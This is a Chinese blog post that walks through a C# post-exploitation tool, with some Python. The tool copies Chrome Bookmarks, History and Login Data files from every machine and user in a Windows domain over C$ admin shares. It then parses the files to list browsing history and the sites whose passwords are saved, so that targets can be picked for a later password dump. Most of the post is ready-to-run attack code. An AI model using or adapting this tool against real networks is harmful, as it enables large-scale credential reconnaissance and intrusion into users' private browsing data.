-
域内批量解析chrome浏览器
上文说了内网批量获取域内文件,在一些场景里面我们需要获取某台机器权限,但是可能之对外开放了80,22等端口无法通过常规手段getshell,可能在某台it个人pc存放了密码本。然而还有一些情况就是我们只需要获取某台web的后台权限即可,在一些内网环境上千台的机器,我们需要一台一台去翻找浏览器密码,就相当麻烦,于是我们可以批量解析域内每台机器,以及对应机器上的用户的chrome浏览器的书签和历史记录以及是否保存了密码为文本,然后再针对的上那台机器去dump密码,可以节约很多的时间成本。0x01 获取chrome相关文件
chrome浏览器的一些保存文件在
C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default- Bookmarks 书签
- History 历史记录
- Login Data 保存密码相关记录
我们按照之前的获取域内文件同理的方法,这里就不过多讲解了。创建machine.txt,逐行读取机器。
获取当前路径创建TargetChromeFiles目录
- string currentpath = Directory.GetCurrentDirectory();
- string DesktopFiles = currentpath + "\\TargetChromeFiles";
遍历users目录如果存在```C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default``如果存在创建机器名文件夹以及对应的用户名文件夹
- string userpath = @"\\" + machine + @"\c$\users";
- var user_list = Directory.EnumerateDirectories(userpath);
- foreach (string user in user_list)
- {
- string ChromePath = user + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default";
- string username = substring(user);
- if (Directory.Exists(ChromePath)){
- string MachineFolder = DesktopFiles + "\\" + machine;
- Directory.CreateDirectory(MachineFolder);
- string UserFolder = MachineFolder + "\\" + username;
- Directory.CreateDirectory(UserFolder);
- }
- }
获取对应机器以及用户的历史记录文件
- string historyPath = ChromePath + "\\History";
- if (File.Exists(historyPath))
- {
- string historyfile = UserFolder + "\\History";
- StreamWriter history_file = File.CreateText(historyfile);
- history_file.Close();
- bool isrewrite = true;
- File.Copy(historyPath, historyfile, isrewrite);
- }
如果存在就继续创建History文件,同理书签和密码保存位置
- string loginPath = ChromePath + "\\Login Data";
- if (File.Exists(loginPath))
- {
- string loginfile = UserFolder + "\\Login Data";
- StreamWriter login_file = File.CreateText(loginfile);
- login_file.Close();
- bool isrewrite = true;
- File.Copy(loginPath, loginfile, isrewrite);
- }
- string BookPath = ChromePath + "\\Bookmarks";
- if (File.Exists(BookPath))
- {
- string bookfile = UserFolder + "\\Bookmarks";
- StreamWriter book_file = File.CreateText(bookfile);
- book_file.Close();
- bool isrewrite = true;
- File.Copy(BookPath, bookfile, isrewrite);
- }
dump效果
Login Data为sqlite保存形式
所以我们需要批量解析本地
TargetChromeFiles目录内的所有文件为文本形式。把结果生在在本地的output_TargetChromeInfos目录。首先创建该目录
- string currentpath = Directory.GetCurrentDirectory();
- string getchromeinfopath = currentpath + "\\output_TargetChromeInfos";
- Directory.CreateDirectory(getchromeinfopath);
遍历
TargetChromeFiles目录所有机器,创建对应的机器目录- string ChromeFilesPath = currentpath + "\\TargetChromeFiles";
- if (Directory.Exists(ChromeFilesPath))
- {
- Console.ForegroundColor = ConsoleColor.Yellow;
- Console.WriteLine("[*]开始解析chrome浏览器信息");
- Console.ForegroundColor = ConsoleColor.White;
- var machine_list = Directory.EnumerateDirectories(ChromeFilesPath);
- foreach (string machine in machine_list)
- {
- Console.ForegroundColor = ConsoleColor.Yellow;
- string out_machine_info = substring(machine); //获取结尾地址
- Console.WriteLine("[*]" + out_machine_info);
- Console.ForegroundColor = ConsoleColor.White;
- //创建本地机器文件夹
- string getmachinepath = getchromeinfopath + "\\" + out_machine_info;
- Directory.CreateDirectory(getmachinepath);
继续创建用户目录
- var user_list = Directory.EnumerateDirectories(machine);
- foreach (string user in user_list)
- {
- Console.ForegroundColor = ConsoleColor.Yellow;
- string out_user_info = substring(user);
- Console.WriteLine(" " + out_user_info);
- Console.ForegroundColor = ConsoleColor.White;
- string getuserpath = getmachinepath + "\\" + out_user_info;
- Directory.CreateDirectory(getuserpath);
因为书签是json格式,这里我没有做任何处理。直接把内容写进out目录的Bookmarks文件了。
- string book_path = user + "\\Bookmarks";
- if (File.Exists(book_path))
- {
- string getbookpath = getuserpath + "\\Bookmarks";
- StreamWriter bookmark = File.CreateText(getbookpath);
- bookmark.Close();
- File.Copy(book_path, getbookpath, true);
- Console.ForegroundColor = ConsoleColor.Green;
- Console.WriteLine(" [*]bookmarks parse success");
- Console.ForegroundColor = ConsoleColor.White;
- }
- else
- {
- Console.ForegroundColor = ConsoleColor.Red;
- Console.WriteLine(" [-]bookmarks not found");
- Console.ForegroundColor = ConsoleColor.White;
- }
如果想要好看点可以如果代码来美化一下即可。
- from os import name
- import re
- f = open('C:/Users/Administrator/AppData/Local/Google/Chrome/User Data/Default/Bookmarks',encoding='UTF-8')
- while True:
- line = f.readline()
- if not line:
- break
- else:
- try:
- line.decode('utf8')
- except:
- res = (str(line))
- url_re = re.compile('"url": "(.*?)"',re.I|re.S)
- name_re = re.compile('"name": "(.*?)"',re.I|re.S)
- url_result = url_re.findall(res)
- name_result = name_re.findall(res)
- for url in url_result:
- print(url)
看到历史记录文件
我们获取想要的即可
- string History_path = user + "\\History";
- if (File.Exists(History_path))
- {
- string gethistorypath = getuserpath + "\\History.txt";
- StreamWriter history = File.CreateText(gethistorypath);
- history.Close();
- SQLiteConnection connect = new SQLiteConnection(@"Data Source=" + History_path);
- connect.Open();
- SQLiteCommand fcmd = connect.CreateCommand();
- fcmd.CommandText = @"select * from urls";
- fcmd.CommandType = CommandType.Text;
- SQLiteDataReader r = fcmd.ExecuteReader();
- string HistoryHostof = "host:" + out_machine_info + "\r\n";
- string HistoryMemberof = "user:" + out_user_info + "\r\n\r\n";
- File.AppendAllText(gethistorypath, HistoryHostof);
- File.AppendAllText(gethistorypath, HistoryMemberof);
- while (r.Read())
- {
- string title = (string)r["title"];
- string out_title = "title:" + title + "\r\n";
- string url = (string)r["url"];
- string out_url ="url:" + url + "\r\n\r\n";
- File.AppendAllText(gethistorypath, out_title);
- File.AppendAllText( gethistorypath, out_url);
- }
- connect.Close();
- Console.ForegroundColor = ConsoleColor.Green;
- Console.WriteLine(" [*]history parse success");
- Console.ForegroundColor = ConsoleColor.White;
- }
- else
- {
- Console.ForegroundColor = ConsoleColor.Red;
- Console.WriteLine(" [-]history not found");
- Console.ForegroundColor = ConsoleColor.White;
- }
关于csharp操作sqlite这里不做过多介绍,网上也有很多相关代码和教程。
最近就是获取密码保存的文件记录
- string LoginData_path = user + "\\Login Data";
- if (File.Exists(LoginData_path))
- {
- string getloginypath = getuserpath + "\\Login Data.txt";
- StreamWriter login = File.CreateText(getloginypath);
- login.Close();
- SQLiteConnection connect = new SQLiteConnection(@"Data Source=" + LoginData_path);
- connect.Open();
- SQLiteCommand fcmd = connect.CreateCommand();
- fcmd.CommandText = @"select * from logins";
- fcmd.CommandType = CommandType.Text;
- SQLiteDataReader r = fcmd.ExecuteReader();
- string HistoryHostof = "host:" + out_machine_info + "\r\n";
- string HistoryMemberof = "user:" + out_user_info + "\r\n\r\n";
- File.AppendAllText(getloginypath, HistoryHostof);
- File.AppendAllText(getloginypath, HistoryMemberof);
- List<String> Field = new List<string>();
- while (r.Read())
- {
- string origin_url = (string)r["origin_url"];
- string out_origin_url = "origin_url:" + origin_url + "\r\n";
- string acition_url = (string)r["action_url"];
- string out_acition_url = "acition_url:" + acition_url + "\r\n";
- Int64 blacklisted_by_user = (Int64)r["blacklisted_by_user"];
- string out_blacklisted_by_user = "blacklisted_by_user:" + blacklisted_by_user + "\r\n";
- File.AppendAllText(getloginypath, out_origin_url);
- File.AppendAllText(getloginypath, out_acition_url);
- File.AppendAllText(getloginypath, out_blacklisted_by_user);
- }
- connect.Close();
- Console.ForegroundColor = ConsoleColor.Green;
- Console.WriteLine(" [*]login data parse success");
- Console.ForegroundColor = ConsoleColor.White;
- }
- else
- {
- Console.ForegroundColor = ConsoleColor.Red;
- Console.WriteLine(" [-]login data not found");
- Console.ForegroundColor = ConsoleColor.White;
- }
当我们获取到
blacklisted_by_user为1说明目标开启了不保存该网站密码,反之则保存。这里测试环境为本机环境,经过大量授权实战环境测试,目前没有发现问题。
最后效果。
-
相关阅读:
短视频运营小技巧,互动引流很重要,内容质量也不能忘
软件测试怎么测别的类的main方法
高斯分解LU矩阵之MATLAB实现
21.PWM应用编程
SpringBoot中如何实现业务校验,这种方式才叫优雅!
Linux:vim
【机器学习】机器的登神长阶——AIGC
上午卷-5.系统开发与运营-软件设计师
JS 封装节流(后期优化)
第十四届蓝桥杯(Web应用开发)模拟赛1期-大学组
- 原文地址:https://blog.csdn.net/hongduilanjun/article/details/127641239
